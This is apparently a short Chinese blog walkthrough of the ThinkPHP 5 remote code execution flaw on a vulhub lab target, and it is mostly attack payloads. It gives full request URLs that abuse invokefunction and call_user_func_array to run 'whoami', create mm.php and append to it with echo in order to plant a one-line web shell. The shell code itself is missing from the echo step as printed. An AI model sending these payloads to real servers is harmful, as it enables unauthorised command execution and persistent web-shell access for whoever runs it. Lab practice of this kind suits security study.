thinkphp 5-rce(rce漏洞getshell)

 vulhub靶场

thinkphp 5-rce(rce漏洞getshell)_第1张图片

http://xxxxx:8080/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

 验证漏洞

thinkphp 5-rce(rce漏洞getshell)_第2张图片

linux系统,可以用touch命令创建文件

http://xxxxx:8080/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=touch mm.php


再用echo写入一句话

http://xxxxx:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo >> mm.php

查看写入成功

thinkphp 5-rce(rce漏洞getshell)_第3张图片

 

你可能感兴趣的:(安全,web安全,php)